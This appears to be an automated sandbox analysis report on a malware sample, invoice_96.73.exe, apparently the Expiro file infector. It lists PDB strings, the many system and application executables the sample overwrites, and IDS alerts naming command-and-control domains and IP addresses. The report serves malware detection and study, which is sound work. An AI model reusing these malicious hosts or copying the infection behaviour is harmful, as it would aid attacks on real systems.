      Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000002.00000003.557364709.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\tnameserv_objs\tnameserv.pdb source: armsvc.exe, 00000002.00000003.489549395.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.487933840.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: WMPNetwk.pdb source: armsvc.exe, 00000002.00000003.417582553.0000000002340000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.418441175.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: SearchIndexer.pdb source: armsvc.exe, 00000002.00000003.420532553.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\kinit_objs\kinit.pdb source: armsvc.exe, 00000002.00000003.464557449.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.465983373.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\unpackexe\unpack200.pdb source: armsvc.exe, 00000002.00000003.490456860.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, unpack200.exe.2.dr
      Source: Binary string: chrome_wow_helper.pdb source: armsvc.exe, 00000002.00000003.573489148.0000000001520000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ieetwcollector.pdb source: armsvc.exe, 00000002.00000003.378562857.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.378697876.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: AcroBroker.pdbsTT6 source: armsvc.exe, 00000002.00000003.494060398.0000000001520000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: armsvc.exe, 00000002.00000003.484025303.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.482732897.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000002.00000003.543127259.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: t:\delivery\x64\ship\0\ose.pdb source: armsvc.exe, 00000002.00000003.388508123.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000002.00000003.549948881.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, FullTrustNotifier.exe.2.dr
      Source: Binary string: PerfHost.pdb source: armsvc.exe, 00000002.00000003.389231981.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.390086664.0000000001CA0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.389367971.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: t:\dw\x86\ship\0\dw20.pdb\x86\ship\0\dw20.exe\bbtopt\dw20O.pdb] source: DW20.EXE.2.dr
      Source: Binary string: t:\dw\x86\ship\0\dw20.pdb source: armsvc.exe, 00000002.00000003.431900302.0000000002150000.00000004.00001000.00020000.00000000.sdmp, DW20.EXE.2.dr
      Source: Binary string: t:\dw\x86\ship\0\dw20.pdb\x86\ship\0\dw20.exe\bbtopt\dw20O.pdb source: armsvc.exe, 00000002.00000003.431900302.0000000002150000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: t:\dw\x86\ship\0\dwtrig20.pdb\ship\0\dwtrig20.exe\bbtopt\dwtrig20O.pdb source: armsvc.exe, 00000002.00000003.435805311.0000000002090000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\orbd_objs\orbd.pdb source: armsvc.exe, 00000002.00000003.471060222.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.472762066.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: vds.pdbH source: armsvc.exe, 00000002.00000003.397013643.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.396407942.0000000002340000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: WmiApSrv.pdb source: armsvc.exe, 00000002.00000003.410168312.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: t:\delivery\x64\ship\0\ose.pdby\x64\ship\0\ose.exe\bbtopt\oseO.pdb source: armsvc.exe, 00000002.00000003.388508123.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: wbengine.pdb@SH source: armsvc.exe, 00000002.00000003.406707369.0000000002340000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.408514012.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, wbengine.exe.2.dr
      Source: Binary string: ALG.pdb source: invoice_96.73.exe, 00000000.00000003.353143094.0000000002990000.00000004.00001000.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.349561520.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.349725788.0000000003690000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: \ship\0\dwtrig20.exe\bbtopt\dwtrig20O.pdb source: armsvc.exe, 00000002.00000003.435805311.0000000002090000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.436668125.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\jabswitch\jabswitch.pdb source: armsvc.exe, 00000002.00000003.444147951.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb00 source: armsvc.exe, 00000002.00000003.557364709.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: msdtcexe.pdb source: armsvc.exe, 00000002.00000003.383128547.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.383373251.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\keytool_objs\keytool.pdb source: armsvc.exe, 00000002.00000003.461065533.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.464249013.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: Eula.pdb source: armsvc.exe, 00000002.00000003.546479748.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\rmid_objs\rmid.pdb source: armsvc.exe, 00000002.00000003.482423318.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.480866013.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: armsvc.exe, 00000002.00000003.377542137.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: AcroRd32Info.pdb source: armsvc.exe, 00000002.00000003.525307374.0000000001520000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\java-rmi_objs\java-rmi.pdb source: armsvc.exe, 00000002.00000003.447269346.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.449170797.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, java-rmi.exe.2.dr
      Source: Binary string: mscorsvw.pdb source: armsvc.exe, 00000002.00000003.358919059.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.357934504.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.360197624.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.356595540.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.356855501.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.357840917.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.359130916.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: Reader_SL.pdb..) source: armsvc.exe, 00000002.00000003.562770680.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, reader_sl.exe.2.dr
      Source: Binary string: E:\r\ws\St_Make\code\build\win\results\FlashPlayerUpdateService\Release\Win32\FlashPlayerUpdateService.pdb source: invoice_96.73.exe, 00000000.00000003.347332988.0000000002A90000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\policytool_objs\policytool.pdb source: armsvc.exe, 00000002.00000003.480547768.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.476508666.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: snmptrap.pdb source: armsvc.exe, 00000002.00000003.391469846.0000000002030000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391488401.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.392623971.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391662820.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391640685.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.392746098.0000000001CA0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391569645.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391549027.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391679575.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: RdrServicesUpdater.pdb;; source: armsvc.exe, 00000002.00000003.505647536.0000000001520000.00000004.00001000.00020000.00000000.sdmp, RdrServicesUpdater.exe.2.dr
      Source: Binary string: t:\dw\x86\ship\0\dwtrig20.pdb source: armsvc.exe, 00000002.00000003.435805311.0000000002090000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.436668125.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: \x86\ship\0\dw20.exe\bbtopt\dw20O.pdb source: armsvc.exe, 00000002.00000003.431900302.0000000002150000.00000004.00001000.00020000.00000000.sdmp, DW20.EXE.2.dr
      Source: Binary string: ieetwcollector.pdbH source: armsvc.exe, 00000002.00000003.378562857.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.378697876.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\toolkit\components\maintenanceservice\maintenanceservice.pdb source: armsvc.exe, 00000002.00000003.382555464.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\java_objs\java.pdb source: armsvc.exe, 00000002.00000003.449717212.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, java.exe.2.dr
      Source: Binary string: TextExtractor.pdb source: armsvc.exe, 00000002.00000003.528202244.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ehRecvr.pdb source: armsvc.exe, 00000002.00000003.367743186.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: y\x64\ship\0\ose.exe\bbtopt\oseO.pdb source: armsvc.exe, 00000002.00000003.388508123.00000000020C0000.00000004.00001000.00020000.00000000.sdmp

      Spreading

      barindex
      Infects executable files (exe, dll, sys, html)
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\CCleaner\CCleaner64.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\ssvagent.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\ehome\ehsched.exeJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSystem file written: C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\jabswitch.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSystem file written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\rmid.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\ieetwcollector.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\java-rmi.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXEJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\javacpl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\kinit.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\javaw.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\ktab.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\tnameserv.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\jp2launcher.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\policytool.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\ehome\ehrecvr.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\keytool.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\java.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\javaws.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\orbd.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\dllhost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\jjs.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\servertool.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\unpack200.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\sppsvc.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\CCleaner\CCleaner.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\klist.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\pack200.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\rmiregistry.exeJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TreatAsJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\ProgidJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler32Jump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandlerJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TreatAsJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Jump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\Jump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Jump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Esl\Jump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Jump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\Jump to behavior

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.22:52781 -> 8.8.8.8:53
      Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.22:49176 -> 47.129.31.212:80
      Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.22:49881 -> 8.8.8.8:53
      Queries random domain names (often used to prevent blacklisting and sinkholes)
      Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
      Source: unknownNetwork traffic detected: DNS query count 37
      Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
      Source: Joe Sandbox ViewIP Address: 34.246.200.160 34.246.200.160
      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.22:49176
      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.22:49176
      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.22:49187
      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.22:49187
